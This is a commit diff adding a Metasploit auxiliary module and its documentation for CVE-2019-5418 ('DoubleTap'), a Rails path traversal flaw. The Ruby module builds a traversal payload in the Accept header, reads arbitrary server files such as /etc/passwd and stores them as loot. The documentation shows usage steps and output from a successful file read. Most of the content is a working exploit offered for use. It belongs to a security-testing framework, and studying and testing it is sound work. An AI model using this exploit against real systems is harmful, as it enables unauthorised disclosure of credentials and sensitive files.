Land #11646, Add module for Rails "DoubleTap" vulnerability

2019-04-18 16:11:09 -05:00 · 2019-04-18 16:11:09 -05:00 · 8ceefce8bf
parent a21f49bea9 7ef9c18b58
commit 8ceefce8bf
2 changed files with 198 additions and 0 deletions
--- a/documentation/modules/auxiliary/gather/rails_doubletap_file_read.md
+++ b/documentation/modules/auxiliary/gather/rails_doubletap_file_read.md
@ -0,0 +1,76 @@
 ## Vulnerable Application
  Ruby on Rails versions <= 5.2.2. The following example shows how to recreate the vulnerable environment on Linux:
  https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/
 ## Verification Steps
  1. Start a Rails server using a vulnerable version 
  2. Start msfconsole
  3. Do: ```use auxiliary/gather/rails_doubletap_file_read```
  4. Do: ```set ROUTE /your_route```
  5. Do: ```set RHOSTS target```
  6. Do: ```set TARGET_FILE /absolute/path/to/remote/file.txt```
  7. Do: ```run```
  8. If everything goes smoothly, you should get the contents of the remote file printed to the console.
 ## Options
  **ROUTE**
  This is a web path or "route" on the vulnerable server. Since the vulnerability lies within the PathResolver of Rails, the route should be in the server's routes.rb file. 
  **TARGET_FILE**
  This is the file to be read on the remote server. This *must* be an absolute path (eg. /etc/passwd).
 ## Advanced Options
  **SKIP_CHECK**
  This options skips the initial vulnerability check and continues thinking the server is vulnerable. 
 ## Scenarios
 ### Version of software and OS as applicable
  ```
 msf5 > use auxiliary/gather/rails_doubletap_file_read
 msf5 auxiliary(gather/rails_doubletap_file_read) > options
 Module options (auxiliary/gather/rails_doubletap_file_read):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target address range or CIDR identifier
   ROUTE        /msf             yes       A route on the vulnerable server.
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGET_FILE  /etc/passwd      yes       The absolute path of remote file to read.
   VHOST                         no        HTTP server virtual host
 msf5 auxiliary(gather/rails_doubletap_file_read) > set RHOSTS localhost
 RHOSTS => localhost
 msf5 auxiliary(gather/rails_doubletap_file_read) > set RPORT 8000
 RPORT => 8000
 smsf5 auxiliary(gather/rails_doubletap_file_read) > set ROUTE /demo
 ROUTE => /demo
 msf5 auxiliary(gather/rails_doubletap_file_read) > run
 [*] Running module against 127.0.0.1
 [+] Target is vulnerable!
 [*] Requesting file /etc/passwd
 [+] Response from server:
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 ...snip...
 systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
 postgres:x:105:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
 [*] Auxiliary module execution completed  
 ```
--- a/modules/auxiliary/gather/rails_doubletap_file_read.rb
+++ b/modules/auxiliary/gather/rails_doubletap_file_read.rb
@ -0,0 +1,122 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'        => "Ruby On Rails File Content Disclosure ('doubletap')",
        'Description' => %q{
          This module uses a path traversal vulnerability in Ruby on Rails
          versions =< 5.2.2 to read files on a target server.
        },
        'Author'      =>
        [
          'Carter Brainerd <0xCB@protonmail.com>', # Metasploit module
          'John Hawthorn <john@hawthorn.email>' # PoC/discovery
        ],
        'License'     => MSF_LICENSE,
        'References'     => [
          [ 'URL', 'https://hackerone.com/reports/473888' ],
          [ 'URL', 'https://github.com/mpgn/Rails-doubletap-RCE' ],
          [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q' ],
          [ 'URL', 'https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/' ],
          [ 'CVE', '2019-5418'],
          [ 'EDB', '46585' ]
        ],
        'Notes' => {
          'AKA' => 'DoubleTap'
        }
      )
    )
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('ROUTE', [true, 'A route on the vulnerable server.', '/home']),
        OptInt.new('DEPTH', [true, 'The depth of the traversal.', 10]),
        OptString.new('TARGET_FILE', [true, 'The absolute path of remote file to read.', '/etc/passwd']),
        OptBool.new('PRINT_RESULTS', [true, 'Print results of module (may hang with large amounts of data).', true])
      ]
    )
    register_advanced_options(
      [
        OptBool.new('SkipCheck', [true, 'Skip the initial vulnerability check.', false])
      ]
    )
  end
  def get_accept_header_value(depth, file)
    return (('../'*depth) + file + '{{').gsub('//', '/')
  end
  def check
    return true if datastore['SkipCheck']
    # Check if target file is absolute path
    unless datastore['TARGET_FILE'].start_with? '/'
      vprint_error "TARGET_FILE must be an absolute path (eg. /etc/passwd)."
      return Exploit::CheckCode::Unknown
    end
    # Fire off the request
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(datastore['ROUTE']),
      'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], '/etc/passwd')}
    })
    if res.nil?
      vprint_error "Request timed out."
      return Exploit::CheckCode::Unknown
    end
    if res.body.include? 'root:x:0:0:root:'
      return Exploit::CheckCode::Vulnerable
    else
      vprint_error 'Target is not vulnerable. Make sure your route is correct.'
      return Exploit::CheckCode::Unknown
    end
  end
  def run
    unless check == Exploit::CheckCode::Vulnerable
      print_error 'Check did not pass, exiting.'
      return
    end
    fail_with(Failure::BadConfig, 'TARGET_FILE must be an absolute path (eg. /etc/passwd).') unless datastore['TARGET_FILE'].start_with? '/'
    print_status "Requesting file #{datastore['TARGET_FILE']}"
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(datastore['ROUTE']),
      'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], datastore['TARGET_FILE'])}
    })
    if res.nil?
      print_error "Request timed out."
      return
    end
    unless res.code == 200
      print_error "Failed to read file: #{datastore['TARGET_FILE']}. HTTP error: #{res.code}."
      print_error 'User probably doesnt have access to the requested file.' if res.code == 500
      return
    end
    unless datastore['PRINT_RESULTS']
      print_good 'Response from server:'
      print_line res.body.to_s
    end
    store_loot('rails.doubletap.file', 'text/plain', datastore['RHOSTS'], res.body.to_s, datastore['TARGET_FILE'], "File read via Rails DoubleTap auxiliary module.")
    print_status 'Results stored as loot.'
  end
 end